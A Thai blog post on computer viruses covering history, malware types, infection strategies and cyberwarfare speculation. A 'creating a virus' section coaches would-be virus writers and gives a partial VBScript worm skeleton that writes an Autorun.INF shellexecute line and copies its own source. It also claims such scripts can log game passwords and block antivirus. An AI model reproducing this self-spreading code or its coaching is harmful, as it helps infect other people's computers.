ย้ายบ้านแล้วครับ...
Group Blog
 
All Blogs
 
ไวรัสคอมพิวเตอร์ไกล้ตัวกว่าที่คุณคิด ภาค 1


สวัสดีครับ...ห่างหายไปนาน...เอาล่ะ...มาเข้าเรื่องไวรัส...วายร้ายดีกว่า...ทุกวันนี้หลายคนรู้...และเข้าใจกันดีว่า "ไวรัสคอมพิวเตอร์" ไม่ใช่ฝุ่นละอองที่ปนเปื้อนด้วยเชื้อไข้หวัดในคน...แต่มันคือ "โปรแกรมจำลองตัวเอง" แบบพิเศษที่สามารถติดเชื้อไปยัง "พาหะ" ที่เป็นสื่อเก็บข้อมูล...และผ่านทางเน็ตเวิร์ค...อย่างไรก็ตาม...เราทุกคนต้องทนอยู่กับเจ้าสิ่งแปลกปลอมนี้ไปอีกนาน...กำเนิดของไวรัสพอสังเขป...เริ่มจาก

1."จอนวอน นิวแมน"ตั้งทฤษฏีว่า"โปรแกรมคอมพิวเตอร์สามารถจำลองตัวมันเองได้"ในหนังสือที่เขาประพันธ์(ตอนนั้นยังไม่มีคอมพิวเตอร์PCที่เราใช้กันอยู่ด้วยซ้ำ)และเขาก็คิดถูก...เพราะหลังจากนั้นไม่นาน

2.ศูนย์วิจัย "เบลแลป"ทำการทดสอบโปรแกรมที่มีชื่อว่า"สงครามหน่วยความจำ"โดยให้โปรแกรมเมอร์ในทีมวิจัย...สร้าง"โปรแกรมที่สามารถจำลองตัวเองเพื่อแย่งชิงหน่วยความจำในเครื่องเมนเฟรม"ผลปรากฎคือ...เกิดโปรแกรมจำพวกไวรัส...ตัวแรกบนโลก...ในห้องทดลอง...โดยที่กระทรวงกลาโหมของสหรัฐอเมริกา...ได้รับรายงานแต่ก็คิดว่ามันไม่มีอันตรายใดๆต่อเครื่องของพวกเขา...

3.หลังจากนั้นไม่นาน...ก็มีไวรัสแพร่ระบาดในเครือข่าย่ของสหรัฐอเมริกา...จนเป็นสาเหตุ...ให้ทุกฝ่ายหันมาให้ความสนใจเรื่องไวรัสคอมพิวเตอร์...

4.ต่อมา"เฟรดโคเฮน"ก็เป็นคนแรก...ที่ตั้งคำจำกัดความให้กับโปรแกรมจำพวกนี้ว่า"ไวรัสคอมพิวเตอร์"พร้อมกับทำไวรัสออกมาเพื่อสาธิตให้กับคนทั่วๆ ไปได้ทราบว่ามันคืออะไรเขาถึงได้สมญาว่าเป็น "บิดาแห่งไวรัสคอมพิวเตอร์" ไวรัสยังคงมีอย่างต่อเนื่อง...

5.ในยุคที่PCถือกำเนิดก็มีไวรัสตัวแรกที่ติดเชื้อบนเครื่อง PC คือ "ซีเบรน" ซึ่งเขียนโดยสองพี่น้องชาวปากีสทาน (ขอไม่เอ่ยนาม...เพราะไม่ใช่วีรบุรุษ) ซึ่งเขียนไวรัสบูตเซกเตอร์ติดเชื้อไปกับแผ่น "บูตดอส"ของดอส 3.1รุ่นโบราณ...ใครก็ตามที่นำแผ่นโปรแกรมละเมิดลิขสิทธิ์ที่สองพี่น้องผู้นี้ขายให้...ติดไวรัสกับบ้านไปทุกคน...

6.ต่อมาเกิดไวรัสติดแฟ้ม .COM, .EXE ที่ชื่อ "เจรูซาเลม" ถือเป็นไวรัสติดแฟ้มข้อมูลจำพวกแรกที่กำเนิดขึ้นบนโลก...คนเขียนเหรอ...ไม่มีใครทราบตัวตนที่แท้จริง...รู้อย่างเดียวว่ามันระบาดในโรงเรียนแห่งหนึ่งใน "เยรูซาเลม" เป็นที่แรก

(ไวรัส "ลาวดวงเดือน" ซึ่งเป็นไวรัสบูตเซกเตอร์และเป็นไวรัสตัวแรกของประเทศไทย...ทุกวันนี้ก็ยังไม่มีใครทราบว่าคนเขียนเป็นใคร...)นิยามที่ทำให้จำแนกมัลแวร์ออกมาได้ดังนี้

1.ไวรัสคอมพิวเตอร์"โปรแกรมจำลองตัวเองไปยังแฟ้มต่างๆได้ (จำกัดความจากแฟ้มคอมพิวเตอร์)"

2.หนอนคอมพิวเตอร์"โปรแกรมจำลองตัวเองไปยังเครื่อข่ายและเครื่องต่อเครื่อง(จำกัดความจากพาหะติดเชื่อ)"

3.ม้าโทรจัน"โปรแกรมทำลายเมื่อเปิดหรือเสียบอุปกรณ์สื่อสาร"

4.แอดแวร์"โปรแกรมเพิ่มหน้าเวปหรือโฆษณาที่ไม่ต้องการในเครื่องคอมฯ"

5.สปายแวร์"โปรแกรมดักจับรหัส...ดักจับข้อมูล...หรือฝั่งตัวเองเพื่อสืบความลับ"

6.โฮแอกซ์"โปรแกรมปลอมๆสนุกๆล้อกันเล่นว่าคือไวรัส...เป็นจดหมายลูกโซ่"รูปแบบการทำงานของไวรัส...

1. ถ้าเริ่มบูตเครื่อง...ไวรัสสามารถครอบครองหน่วยความจำ...Viture Memory ได้...ก่อนโปรแกรมฆ่าไวรัส...ไวรัสจะชนะทันที (บูตเซกเตอร์ และ พาทิชั่นไวรัส)

2. ถ้ายังไม่ได้...จะเริ่มแทรกซึมเช้าสู้แฟ้มระบบของวินโดวส์...เพื่อย้ายการค้นหาไวรัสไปยังแฟ้มที่ไวรัสหลอกเอาไว้...ถ้าทำได้...ไวรัสก็จะชนะอีก (ไวรัสฝั่งตัวในหน่วยความจำ หรือ สเตร์ทไวรัส "ไอ้เครื่องบินรบ")

3. ถ้ายังไม่ได้...จะฝั่งตัวเข้าระบบฐานข้อมูลวินโดวส์เช่นแฟ้ม service .ini, .inf, และ Registry เพื่อไม่ให้ โปรแกรมฆ่าไวรัสมาฆ่ามันได้...ถึงแม้ตรวจเจอก็ตาม (ไวรัสสคริปวินโดวส์...หรือซิสเต็มไวรัส)

4. ถ้ายังไม่สำเร็จ..."รีโทล ไวรัส" จะทำการลบโปรแกรมฆ่าไวรัสทิ้งซะ...ตอนนี้ต้องแข่งขันกันเชิงกลยุทธ์ ระหว่าง "เทพกับมาร" ใครแพ้ต้องตาย...!

5. ถ้ายังไม่สำเร็จ...จะเปลี่ยนหน้าตาตัวเอง...ไม่ให้ซ่ำกัน..."โพลีมอฟิก ไวรัส" จะแพร่ตัวเองอย่างรวดเร็วโดยเป็น "จอมโจรพันหน้า" ถึง...ตำรวจอย่างโปรแกรมฆ่าไวรัสจะเจอ...ก็ฆ่าได้บางตัวที่จำหน้ามันได้...แต่ฆ่าไม่ได้ทุกตัวเพราะ...มันเปลี่ยนหน้าตาไปทุกครั้งที่แพร่เชื้อ

6. ถ้ายังไม่สำเร็จ...ก็จะติดต่อ...สื่อสาร...กับจอมมารในเน็ตเวิร์ค(ผู้เขียนไวรัส)...เพื่อดาวน์โหลดโปรแกรมไวรัสรุ่นใหม่ๆ ลงมา...ต่อสู้กับโปรแกรมฆ่าไวรัส (อินเตอร์เน็ตไวรัส...หรือ มัลแวร์แบ็กดอร์ "พวกชอบประตูหลัง")

7. ถ้ายังสู่โปรแกรมฆ่าไวรัสไม่ได้อีก...ไม่รู้จะเขียนอะไรดี...ปล่อยจดหมายลูกโซ่แกล้งคนอื่นๆ ดีก่า...ว่ามันเป็นไวรัส...ถ้าไม่ส่งต่อ...ติดเชื้อถึงตาย..."โฮแอกซ์ หรือ ไวรัสตลก..."

8. โอยยังมี "มัลติแพล็ตฟอร์มไวรัส...มัลติโอเอสไวรัส...รันไทม์ไวรัสอีก...ที่ยังไม่กล่าวถึง..."ผมถามจริงๆ เหอะ...เขียนขึ้นมาเคยได้สตังค์กันบ้างใหม?"เรื่องยุทธการทางการทหารของไวรัสคอมพิวเตอร์....

คุณ...ๆ เคยรู้ไหมว่า...สงครามอิเล็กทริก มันมีจริง...และไม่ใช่แค่นิยายด้านวิทยาศาสตร์ แบบเรื่อง ID4 แต่ความจริงแล้ว...ไวรัสคอมพิวเตอร์นั้นสามารถนำมาทำเป็นยุทธโทปกรณ์ด้านอิเล็กทรอนิกส์ กันจริงๆ ...ถ้าอยากรู้ก็รอดูสงครามโลกครั้งที่ 3 (ไม่รู้มันจะเกิดจริงหรือเปล่า) ผมอาจจะไม่มีข้อมูลหรือหลักฐานที่มากไปกว่า...การทดลองและคำพูดที่เลือนลอย...แต่คุณก็จินตนาการตามแล้วกันว่า...จะใช้ไวรัสคอมพิวเตอร์ทำอะไรบ้างในสนามรบ....

1. ช่วงชิงการทำลายฐานข้อมูลข้าศึก... "ก่อนที่จะทำการโจมตีข้าศึกในแนวรบนักการทหารจะต้องใช้กลยุทธทุกๆ อย่างในการทำลายส่วนควบคุมบัญชาการรบของแนวข้าศึกเพื่อลดทอนประสิทธิภาพในการรบออกไป...เช่น ปล่อยไวรัสคอมพิวเตอร์ไปยังสัญญาณ ไวเลช...บูททูสน์...หรือ อินเตอร์เน็ต...ก่อนออกแถลงการโจมตี และส่งเครื่องบินไร้คนขับ...ปล่อยสัญญาณความถี่ชนิดพิเศษ(ไม่ทราบชื่อของมันแต่มีอยู่จริง) เพื่อเชื่อมโปรเซส ของ CPU PC คอมพิวเตอร์ให้เป็น Asmbly Code ที่ต้องการ...และช่วงชิงการทำลายข้อมูล เข้ารหัส...และ

ฝั่ง Back Door เอาไว้เพื่อล้วงความลับของคอมพิวเตอร์ส่วนบุคคลแดนข้าศึก"

2. ทำลายการสื่อสาร...ดาวเทียม...และการบัญชาการ..."เมื่อประกาศการรุกรานนักการทหารข้าศึกจะสั่งการตอบโต้...แต่ถ้าถูกตัดสัญญาณการบัญชาการรบหัวรบขีปนาวุธ...เครื่องบินรบ...กองเรือยุทธการ...รวมถึงกำลังภาคพื้นดิน...ไวรัสจะมีหน้าที่ในการก่อกวนการสื่อสาร...บางครั้งแทรกซึม...แพร่กระจายตัวยังเครือข่าย...ทั้งเครื่อง "เมนเฟรม", "ซุปเปอร์คอมพิวเตอร์" โดยให้มันทำงานเกินอัตตราหรือ เข้ารหัสสัญญาณเก็บข้อมูล...รวมทั้งปล่อยข่าวล่วงด้านการศึก...หากสำเร็จเพียง 1 เครื่อง ใน 10 เครื่องก็ถือว่า ชนะในสงครามด้าน อิเล็กทริก"

3. สืบค้นข้อมูลสำคัญ...และส่งข้อมูลที่จำเป็นกับสู่แนวรบ..."เมื่อทำศึกแล้ว สิ่งที่สำคัญที่สุดในยุทธปัจจัย...คือ การข่าว...ไวรัสคอมพิวเตอร์จะส่งข้อมูลด้านสารสนเทศออกจากฐานข้าศึกในทุกรูปแบบ...ทุกชั่วโมงและวินาที...ไม่ว่าจะเป็นรายชื่อทหารเสนาธิการ...กองกำลังแนวหน้า...หรือแผนที่ทางการทหาร...อาวุทยุทโธปกรณ์ที่ใช้ทำส่งคราม...ไม่ว่าข้อมูลในส่วนใดก็ตามถ้าเล็ดลอดออกไปได้...จะเกิดผลเสียต่อข้าศึกอย่างมาก"

4. ควบคุม...ทำลาย...เทคโอเวอร์..."คำสั่งนี้...จะเป็นคำสั่งสุดท้ายของไวรัส...คือมือถูกจับตัว...หรือถูกค้นพบ...จะทำลายตัวเอง...เพื่อไม่ให้ถอดรหัสคำสั่งหรือ...ถูกขวางการทำงานด้านอิเล็กทริก...จะส่งคำสั่งพิเศษทำลายอุปกรณ์ด้าน ฮาร์ดแวร์ (ทำได้ในภาพทฤษฎีและเคยทำสำเร็จในห้องทดลอง) เพื่อถ่วงเวลาการกู้ข้อมูลและการสืบค้นไวรัส...รวมถึงทำลายฐานข้อมูลทุกรูปแบบ..ไม่ว่าจะเป็นรายชื่อสำมะโนครัว...โปรแกรมพื้นฐานต่างๆ ...ข้อมูลเข้ารหัสต่างๆ...โดยไม่สนใจว่าสำคัญหรือไม่...ด้วยวิธีการพิเศษที่ไม่สามารถทำการกู้ข้อมูลได้ ไม่ว่าจะเป็น

การเขียนทับ...Empty Folder หรือ สร้างม้าโทรจัน...เชื่อมต่ออุปกรณ์ต่อเติม...ลอจิกบอมส์แบบ รันไทม์ ถึงแม้คำสั่งเหล่านี้จะเป็นคำสั่งพื้นฐาน...แต่มันมีผลมากต่อผู้ใช้เทคโนโลยีสารสนเทศ เหมือนกับ...สายระเบิดที่นักกู้ระเบิดรู้อยู่แล้วว่าต่อสลับวงจร...แต่ก็กดดันจิตวิทยา...และสร้างความสับสนให้ผู้กู้ข้อมูลพอสมควร

5. ท้ายที่สุด...."มีไวรัส...เหมือนไม่มีไวรัส" หมายถึง..."ไม่ว่าสงครามจะออกมาในรูปแบบใด...ไวรัสคอมพิวเตอร์จะต้องฝั่งตัวอยู่ต่อไป...แม้ว่าถูกจับได้...หรือประเทศรุกรานพ่ายแพ่...แต่ไวรัสคอมพิวเตอร์เหล่านั้นจะต้องฝั่งตัวอย่างเงียบ..ๆ เสมือนว่าไม่เคยเกิดอะไรขึ้น...และรอค่อยการเรียกใช้งานอีกครั้ง...ผ่าน BackDoor ("ประตูหลัง...ทางสู่นรก")" คุณๆ ยังไม่รู้หลอกครับว่า...เขียนไวรัสขึ้นมา 1 ตัว...ต้องใช้ประสบการณ์และจินตนาการขนาดไหน...ไม่ต้องสงสัย...หรือเชื่อในสิ่งที่ผมเล่ามาหลอกครับ...เพียงคุณลองจินตนาการดูซิว่า "มิจฉาชีพทุกคนเขียนไวรัสเป็นโลกจะวุ่นวายขนาดไหน" และถ้าคำพูดแค่ "คัดลอกฉันไปยังทุกๆ เครื่องบนโลกใบนี้" มันสามารถทำได้จริง...จะเกิดอะไรขึ้น...ในโลกของคุณ....การสร้างไวรัส

1. การสร้างไวรัส...นั้นไม่ต้องมากครับ...ผู้เขียนไม่จำเป็นต้องเรียนเก่งระดับปริญญาเอก...หรือโท...แต่คุณมีความสามารถด้านภาษาอังกฤษแบบงูๆ ปลาๆ เต่าๆ ก็ได้...

2. เร่งเห็นความสำคัญของการศึกษาไวรัส...เพื่อ...ป้องกันตัวเองครับ...แรกๆ คุณอาจคึกคะนองอยากเห็นผลงานชิ้นโบว์แดงแพร่ระบาด...ขอบอกเลยนะ...ยากครับ...เพราะคุณต้องมีทักษะระดับเซียนเพื่อฆ่าไวรัสคู่แข่งด้วย...เหมือนการวิ่งเข้าเส้นชัยเพื่อกลับไปเกิดอีกครั้งเลย...เพราะต่างค้นต่างต้องการแย่งชิง Autorun.INF

3. ถ้าคุณเขียนไวรัสขึ้นมาแล้ว...ย่ำอย่างมาก...อย่านำคำสั่ง Bomb ติดไปกับไวรัสนะ...เพราะมันสร้างความเดือดร้อนให้กับผู้ติดเชื่ออย่างมากอย่าง KillVBS แรกๆ ผู้เขียนไวรัส...ตั้งใจจะให้มันฆ่าไวรัส .VBS ตัวอื่น...แต่หลังๆ เริ่มนำปัญหามาสู่ระบบของผู้อื่นอย่างชัดเจน...

4. เริ่มเลย...ถ้าไม่มีอคติ...กับผู้ที่เรียกตัวเองว่า "เวิร์มเมอร์" ทั้งหลาย...(แต่ถ้าคุณเรียกตัวเองว่า "แฮกเกอร์" ไม่อายเหรอที่ยังไม่มีพื้นฐานด้านความปลอดภัยระบบเพียงพอ...หรือไม่ใช่ คุณเป็น "แครกเกอร์" ก็เช่นกันเก่งแต่เจาะระบบชาวบ้าน...แต่เครื่องตัวเองเต็มไปด้วยเชื้อโรคผู้อื่น และฆ่ามันไม่เป็น)

5. กลยุทธ์พื้นฐานคือ ภาษา VBScript มันคือคำสั่งที่ต้องพึ่งพา WScript.EXE ฉนั้นท่าไม้ตายที่ดีที่สุดในการกำจัดไวรัสพวกนี้คือ...ลบมันทิ้ง...หรือเปลี่ยนชื่อมันเป็นอย่างอื่นซะ...

6. แน่นอนแหละไม่มีใครใช้ .VBS เล่นงานคุณได้..แต่ถ้าจะเล่นงานคนอื่นล่ะนำมันกลับมาก่อน...เขียนคำสั่งลงไป...ไม่มีสูตรตายตัวครับ...สำหรับการสร้างไวรัส .VBS แต่ที่สำคัญ...คือ...คุณคิดว่า...เด็กที่กำลังคลานตามคุณมาจะเก่งกว่าหรือแกล้งคุณได้สบายๆ หรือเปล่า...(มันก็เหมือนพ่อมดรุ่นใหม่ๆ...กำลังจะแซงแฮรี่พอร์ตเตอร์อย่างพวกคุณ)

7. พล่าม...เยอะ...แต่...ต้องเริ่มสอนแฮรี่พอร์ตเตอร์ร่ายคาถากันก่อน...

7.1 ใน Notepad จะเป็นตัวเขียนไวรัสชั้นดี...ยิ่งใน Notdpad++ สามารถบอกโครงสร้าง .VBS ได้เป็นอย่างดี...แต่มันไม่สำคัญเท่ากับการต้องรู้เงื่อนไขกติกาการเขียนซะก่อน

7.2 ภาษา VBScript เป็นภาษาที่ต้องอาศัยความชำนาญทางด้าน ฟังก์ชั่นของระบบปฏิบัติการเช่น สามารถสร้าง Shot Cut เพื่อหลอกผู้อื่นได้...(ตัวอย่างมันอยู่ใน Win Me ทุกเครื่อง) หรือ สามารถติดต่อกับ Excel เพื่อสร้างไวรัสที่ติดเชื้อ Excel ได้ด้วย...(ตัวอย่างอยู่ใน Win Me เช่นกัน) มันสามารถทำให้ระบบRegistry ไม่สามารถ Load โปรแกรมฆ่าไวรัสได้ด้วย

หรือแม้กระทั่ง...ดักแป้นพิมพ์ทุกแป้นที่ผู้ใช้เครื่องคนนั้นใช้เป็นรหัสผ่านในการเล่นเกมส์เช่น...เกมส์ออนไลน์ต่างๆ ได้...(อู้...อู้...ขี้โม้ล่ะมั่ง...เปล่าหลอกไอ้น้อง...มันมีจริง...แต่ต้องศึกษากัน)

7.3 เมื่อสร้างความทะยานอยากให้พวกคุณแล้ว...ความชั่วในตัวเริ่มสูบฉีด...แต่ยังไม่พอ...คุณต้องมีสติพอที่จะรู้ว่า...ไม่ง่ายนะ...ถ้าคุณคิดแบบเด็กๆ ที่กำลังอยากจะเอาชนะ...เพราะก่อนอื่น...ภาษา VBS นั้นเขียนง่ายมาก...ถ้ามีเครื่องมือแบบ "วิชวล" คือ "มันจะบอกถึงกิ่งก้านสาขาของคำสั่งที่คุณเขียน...และข้อผิดพลาดมีน้อยมาก" แต่ "ของฟรีไม่มีในโลก" ผมเองยังหามาใช้ไม่ได้เหมือนกันฮุๆๆๆ เลยสอนแบบ ไทยๆ เรานี้แหละ... NotePad เจ้าเก่าเรา...ผิดก็รันไม่ได้แค่นันเอง...

8. ภาษา VBScrip ต้องการคำสั่งเชื่อมต่อเพื่อบ่งบอก Object ที่จะเรียกใช้เช่นCreateObject("WScript.Shell").Run "คำสั่ง DOS"คือ เรียก WScript เพื่อทำงานด้วยคำสั่งDOS (Shell "หอย" นี้แหละที่ติดต่อกับคาถาระดับสูง DOS) Object คือ Wscript.Shell คำสั่งเชื่อมต่อมาคือ .Run หรือเราจะเขียนอย่างนี้ก็ได้Set DosCmd = CreateObject("WScript.Shell")

DosCmd.Run "คำสั่งดอส"คือ กำหนดตัวแปร DosCmd เพื่อเก็บคำสั่ง CreateObject("Wscript.Shell') ที่แสนจะยาวยืด ตามด้วยคำสั่งเชื่อมต่อก็ได้' ส่วนนี้ถ้านำหน้าด้วย ' จะเป็นคอมเมนต์เพื่อบอกความหมายของคำสั่งหรือ

' เราจะใช้บอกอะไร ...ถึงผู้ติดเชื้อไวรัสของเราก็ได้

' ใส่ข้อความบอกให้ผู้ติดเชื้อทราบเมื่อเปิดอ่าน...ได้เลย

on error resume next

' ผิดพลาดอะไรข้ามไป 1 ที

dim AutoRun, Code, IsDrive, Virus, SysFile, Data, MyFile

' ประกาศตัวแปรที่ใช้ในโปรแกรม (ต้องประกาศให้ครบถึงทำงานบน .VBS ได้)

AutoRun="[autorun]" & vbNewLine &"shellexecute=wscript.exe ไวรัสฉันเอง.vbs"

' ให้ตัวแปร AutoRun เป็นคำสั่งใน Autorun.INF

set SysFile=createobject("Scripting.FileSystemObject")

' กำหนดตัวแปร SysFile เป็นคำสังของ System File Object

set Virus=SysFile.getfile(Wscript.ScriptFullname)

' กำหนดให้ Virus เป็นชื่อของสคริปที่รัน

set Data=Virusastextstream(1,-2)

' กำหนกให้ Data เป็นข้อความในไวรัส

do while not Data.atendofstream

' ทำจนกว่าข้อความในไวรัสถูกก็อปหมด

Code=Code & Data.readline & vbnewline

' Codeคือข้อความที่ทุกบรรทัด

loop

'วนการทำงานจนจบปัญหาไวรัส...เรื่องราวที่

เอาล่ะ...ทิ้งเรื่องไวรัสมานาน...มาพูดกันหน่อยก่อนสิ้นปี...ผมเป็นคนหนึ่งที่เข้ากระทู้พันทิป...เพื่อศึกษาการทำงานของโปรแกรมและเขียนโปรแกรม...เป็นหลักส่วนตอบกระทู้เพื่อสอนวิธีฆ่าไวรัสนั้น...ไม่ใช่งานเลยครับ...เพราะบางคนก็ยังมีความคิดแบบเดิมๆ คือ DOS เป็นอะไรที่ต้องห้าม...หรือเป็นคำสั่งยุคโบราณที่คนสมัยใหม่...เห็นว่าเชย...และไม่ค่อยมีใครรู้จริง...นอกจาก..."ขาแฮก" หรือ"ขาแครก" กัน...ที่คนพวกนั้นไว้เจาะระบบกันจริงจัง...พบเป็นคนหนึ่งครับ...ที่พูดกันจริงๆ เลยว่าฝีมือเรื่อง DOS ยังไม่ถึงขั้น...ไม่ใช่ถล่มตัวนะครับ...แต่ยังต้องอาศัย Blog แห่งนี้โพสต์ความรู้เก็บเอาไว้เตือนความจำเหมือนกัน...เอาล่ะ...เข้าเรื่องไวรัส...ประเภทของไวรัส(แบ่งตามระดับการทำงานและภาษาทีใช้งาน)

1. ไวรัสบูตเซกเตอร์ (Boot Sector or Boot Infector Viruses)

ปกติโดยทั่วไปแล้ว...ฮาร์ดดิสก์ทุกๆ ตัวจะมี บูตเซกเตอร์อยู่แล้ว ซึ่งเป็นตำแหน่งที่อุปกรณ์ใช้อ้างอิงเพื่อให้รู้ว่าเป็นตำแหน่งเริ่มต้นของการอ่านและเขียนข้อมูลเพื่อใช้เป็นหลักการอ้างอิงข้อมูลกับซอฟต์แวร์ ในส่วนของรายละเอียดเกี่ยวกับ หลักการทำงานผมไม่ขออธิบายอะไรมาก แต่จะอธิบายสั้นว่า "เอ็มบีอาร์; MBR หรือ Master Boot Record" จะเป็นส่วนที่สำคัญที่สุดของอุปกรณ์ประเภทนี้ หากส่วนนี้เสียหายจะทำให้ฮาร์ดดิสก์ทั่งลูกไม่สามารถทำงานได้เลย ซึ่ง "เอ็มบีอาร์" ของฮาร์ดดิสก์มีขนาด 512 ไบต์ หรือ ห้าร้อยสิบสองตัวอักษร ซึ่งเป็นขนาดมาตราฐานของเอ็มบีอาร์ และบางที อาจจะมีขนาดใหญ่กว่านั้นมาก ในระบบปฏิบัติการ Linux อย่างไรก็ดี "เอ็มบีอาร์" จะถูกระบุขนาดของดิสก์ขั้นพื้นฐาน รวมถึง ซีเรียลนัมเบอร์ของฮาร์ดดิกส์ลูกนั้น และประกอบไปด้วยคำสั่งของ BIOS ในขั้นพื้นฐานเพื่อเชื่อมต่อกับระบบปฏิบัติการในขั้นตอนการบูตอัปต่อไป จากนั้นภายในตัวระบบปฏิบัติการก่อจะสร้าง "ดีบีอาร์ ; DBR หรือ DOS Boot Record และ ตารางพาร์ทิชั่น" ซึ่งเป็นตำแหน่งทางตรรกะ กล่าวคือ เป็นตำแหน่งที่ทำหน้าที่จำลองอุปกรณ์ออกเป็นไดร์ฟข้อมูลทางตรรกะขึ้นเพื่อความสะดวกของการติดต่ออุปกรณ์นั้นๆ เช่น ไดร์ฟ C: และ D: เพื่อให้ฮาร์ดดิสก์หนึ่งตัวสามารถมีระบบปฏิบัติการที่มากกว่า 1 ระบบ ได้ ใน "ดีบีอาร์" นี้ก็มีลักษณะเหมือนๆ กับ "เอ็มบีอาร์" เพียงแต่ ขนาดของฮาร์ดดิกส์จะถูกระบุเป็นขนาดของไดร์ฟ และขนาดของเซ็คเตอร์จะถูกระบุเป็นขนาดของคลัสเตอร์ต่อ FAT ซึ่งจะบ่งบอกว่าขนาด FAT เป็นเท่าใด โดยทั่วไป แล้วไวรัสมักจะไม่สามารถเข้ามาติดในส่วน "ดีบีอาร์" ได้ แต่ไวรัสบางตัวมีความสามารถในการดักจับและตรวจสอบตำแหน่งจึงสามารถติดเชื้อใน "เอ็มบีอาร์" และ "ดีบีอาร์ (ที่บางคนเรียกว่า ตารางพาร์ชั่น)" โดยปกติไวรัสบูตเซกเตอร์ในยุคแรกๆ จะติดเชื้อใน "เอ็มบีอาร์" ต่อมาก็ถูกเขียนและพัฒนาให้ติดเชื้อใน "ดีบีอาร์" ได้ด้วย จึงทำให้คำสั่ง FDISK /MBR ไม่สามรถฆ่ามันได้ทุกตัวเสียแล้ว จึงต้องอาศัยความเชี่ยวชาญอย่างมากในการฆ่าไวรัสประเภทนี้...บางครั้งจะพบว่าบางคนบอกว่าไวรัส " บูตเซกเตอร์ฆ่าง่ายๆ ทั่งๆ ที่จริงแล้วไวรัสจำพวกนี้ส่วนใหญ่ ฆ่ามันง่ายๆ ก็จริงแต่พวกไวรัส DieHard และ Stone นั้น...(ติดเชื้อใน DBR และตารางพาร์ทิชั่นได้ด้วย) ต้องพึ่งพาโปรแกรมฆ่าไวรัสอย่างเดียว...ถ้าเป็นสมัยนี้ ไวรัสจำพวกนี้ถูกเขียนขึ้นมาชนิดใหม่อาจทำให้ช่างซ่อมคอมพิวเตอร์บางคนเคลมสินค้าหนีความจริงกันทีเดียว2. โปรแกรมไวรัสหรือไวรัสแฟ้มคำสั่ง (Program or File Infector Viruses)

โปรแกรมไวรัสนั้น เป็นไวรัสรุ่นเก่าๆ ที่ผู้สร้างโปรแกรมไวรัสนั้นต้องมีทักษะความสามารถใน "ภาษา Asembly" พอสมควร หรือใช้ "ภาษา C" เพื่อเขียนโปรแกรมไวรัสขึ้นมา ไวรัสจำพวกนี้เน้นการทำงานร่วมกับหน่วยความจำเป็นหลัก ตัวคำสั่งของไวรัสเองจะแตกออกเป็นชิ้นๆ เพื่อกระจายตัวอยู่แฟ้ม .COM หรือ .EXE จึงทำให้การกำจัดไวรัสพวกนี้ทำได้ยากมาก ต้องอาศัยคำสั่งในโปรแกรมฆ่าไวรัสเท่านั้นถึงจะทำลายไวรัสจำพวกนี้โดยที่แฟ้มติดเชื้อจะไม่เสียหายเลย ไวรัสจำพวกนี้ก็มีหลักการทำงานทุกรูปแบบ ที่อธิบายไว้ตอนต้น ถึงอย่างไรในปัจจุบันไวรัสจำพวกนี้พบในเครื่องคอมพิวเตอร์ส่วนบุคคลน้อยมากในยุคระบบปฏิบัติการวินโดวส์ เพราะชุดคำสั่งควบคุมในวินโดวส์ไม่เอื้อต่อการแพร่เชื้อเหมือนสมัยที่เป็น DOS อยู่นั้นเองมาดูรูปแบบจำลองคำสั่งไวรัสแบบเขียนทับ

1. [1. IAmVirus] คือคำสั่งของไวรัส

2. [1. ผมคือโปรแกรมครับ] มันคือคำสั่งโปรแกรมของพวกคุณ

3. เมื่อคำสั่งไวรัสแบบเขียนทับ...ทำงาน มันจะทำให้โปรแกรมของพวกคุณเป็นเช่นนี้ [1. IAmVirusแกรมครับ] คำสั่งไวรัสจะทับคำสั่งเดิมของโปรแกรมเป็นผลทำให้โปรแกรมเสียหายในทันที

4. เมื่อมันต้องการติดเชื้อแฟ้มอื่นด้วย เช่น จะติดเชื้อใน [1. ข้า][2. คือ][3. แฟ้ม][4. ระบบ]

5. มันก็จะเขียน [1. IAmVirus][2. คือ][3. แฟ้ม][4. ระบบ] ทับแฟ้มระบบที่มีขนาดเล็กกว่ามันเสียหายจนทำให้ระบบทำงานผิดพลาดไป

...เป็นสาเหตุให้ไวรัสชนิดนี้ทำงานไม่ประสบความสำเร็จมาดูรูปแบบจำลองคำสั่งไวรัสแบบเขียนต่อเติม...

1. [1. I][2. AmVirus] คือคำสั่งของไวรัส

2. [1. ผมคือโปรแกรมครับ] มันคือคำสั่งโปรแกรมของพวกคุณ

3. เมื่อคำสั่งไวรัสแบบเขียนต่อเติมทำงาน มันจะทำให้โปรแกรมของพวกคุณเป็นเช่นนี้ [1. I][3. คือโปรแกรมครับ][2. AmVirusผม]

4. เมื่อมันต้องการติดเชื้อแฟ้มอื่นด้วย เช่น จะติดเชื้อใน [1. ข้า][2. คือ][3. แฟ้ม][4. ระบบ]

5. มันก็จะแตกตัวจาก [1. I][3. คือโปรแกรมครับ][2. AmVirusผม] เป็น [1. I][2. AmVirus] เช่นเดิม

6. จึงแพร่เชื้อเข้าสู่ [1. I][3. คือ][4. แฟ้ม][5. ระบบ][2. AmVirusข้า]

...มันจึงประสบความสำเร็จอย่างมากในการแพร่เชื้อในสมัยก่อน...

3. สคริปไวรัส (Scripts Viruses)

ไวรัสชนิดนี้ โดยทั่วๆ ไปจะพบเป็นหนอนคอมพิวเตอร์เสียส่วนใหญ่ในปัจจุบัน คือการอาศัยแฟ้ม Autorun.INF เพื่อเรียกพวกมันทำงานเมื่อเสียบอุปกรณ์เก็บข้อมูลแบบ Removable นั้นเอง การทำงานของไวรัสสคริปหรือหนอนจำพวกสคริป จะอาศัยประโยชน์จากคำสั่งของระบบปฏิบัติการเป็นคำสั่งอำนวยการแพร่เชื้อไวรัส แม่แต่ “เวปเพจ” เองก็พบไวรัสจำพวกนี้เหมือนกัน เพราะแฟ้ม .HTM หรือ .HTML จะอาศัยภาษา “วิชวลเบสิคสคริป” และ “จาวาสคริป” เป็นคำสั่งเสริมการทำงานเพื่อให้เวปเพจสามารถทำงานที่สลับซับซ้อนได้ ซึ่งในชุดคำสั่งเหล่านั้นเป็นเพียง “Text และ ข้อความธรรมดา” จึงทำให้คำสั่งที่เป็นข้อความถูกเคลื่อนย้ายและจำลองชุดข้อความนั้นไปยังแฟ้มอื่นๆ ได้ ไม่แปลกเลยที่เวปไซด์เอง จะเป็นช่องทางในการแพร่ไวรัสช่องทางหนึ่งที่มีความสกปรกอย่างมาก แต่ระบบปฏบัติการ Windows XP นั้นไปทำการอุดช่องว่างเหล่านั้นโดยการเพิ่มความปลอดภัยที่เรียกว่า “Fire Wall ; ไฟล์วอลล์” เพื่อปิดกั้นช่องทางของไวรัสและแฮกเกอร์มือใหม่4. มาโครไวรัส (Macro 